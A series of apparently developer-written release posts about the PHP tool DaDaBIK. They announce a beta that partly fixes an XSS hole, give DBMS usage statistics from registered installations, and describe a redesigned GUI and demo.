last night I discovered an important security hole in DaDaBIK so I decided to immediately release a version 4.3 beta2 with the only purpose of partially fixing it. All the other bug fixes and new features are waiting for the version 4.3 rc1, avaiable in 1 or 2 weeks as expected.
Among other problems, this could lead to XSS attack (http://en.wikipedia.org/wiki/Cross-site_scripting), which in turn could allow an unauthorized access to the application (http://en.wikipedia.org/wiki/Session_hijacking) and, if the Internet browser of the user contained security holes, even the execution of arbitrary code in the client machine.
The new 4.3 beta2 solves this problem. Even the DaDaBIK demo was affected and exploited by a malicious user; now it has been patched.
The problems described above can however occur even when the insert or edit feature was enabled (at least for one table) and the HTML content type is used; at the moment there isn't a patch for this second scenario, so the HTML content type should be used very carefully, as highlighted in the upgraded documentation. In the next few days, I would like to use something like http://htmlpurifier.org to allow the users to insert html text without security problems.
The 4.3 beta2 also fixes another minor GUI bug, as you can read from the changelog.
Starting with the last 4.3 beta, the users can register the installation of DaDaBIK; I receive information about DBMS type and DaDaBIK version.
97 installations have been registered so far and these are the statistics about the DBMSs usage:
MySQL: 95 installations
PostgreSQL: 2 installations
Oracle: 0 installations
MS SQL Server: 0 installations
97 is (statistically) still a small number but I'm wondering if DaDaBIK is still used with non-MySQL DBMSs....maybe the tipical Oracle or MS SQL Server user doesn't work much with PHP but I think that it's not true for a PostgreSQL user.
I decided to dedicate some time in future to test DaDaBIK with other DBMSs (SQLite and DB2) but if everybody's using MySQL I don't know if it's still a good idea.
I have finished the redesign of the admin section: new look, some improvements in the interface, in-line help for the interface configurator.
This will be released soon with DaDaBIK 4.3 release candidate 1, together with an improved documentation and a new enterprise-oriented demo (an invoicing system) that I'm developing.
I've cleaned and improved a bit the demo section in order to show easily some DaDaBIK features.
I've also made a downloadable version of the demo. This can be a good learning tool, looking at the configuration/settings you can easy learn by example how to get the same result. Instructions on how to install the demo included in the downloaded file. Available just for MySQL.
yes, difficult to believe but true!
DaDaBIK is powerful and easy to use but the GUI has always been something that could hurt....
Why? Because I'm too nerdy to take care about GUIs? No, just because having limited time I've always preferred to spend it improving the features set and fixing bugs.
But your long wait is over, some days ago I discovered by chance a very nice DaDaBIK graphic customization made by Erik Pöher; I firstly started to implement that GUI but I ended up developing the GUI from scratch, in part inspired by Erik's work. Here is the result: demo (user: demo1; password: password).
There is still space for improvement (better warning/error messages for example) but I think it's much better than before. Let me know what you think.
Another important improvement: magic_quotes_gpc set to On is not anymore needed.
There are also several bugfixes, as you can see from the changelog; some new bugs were also dscovered.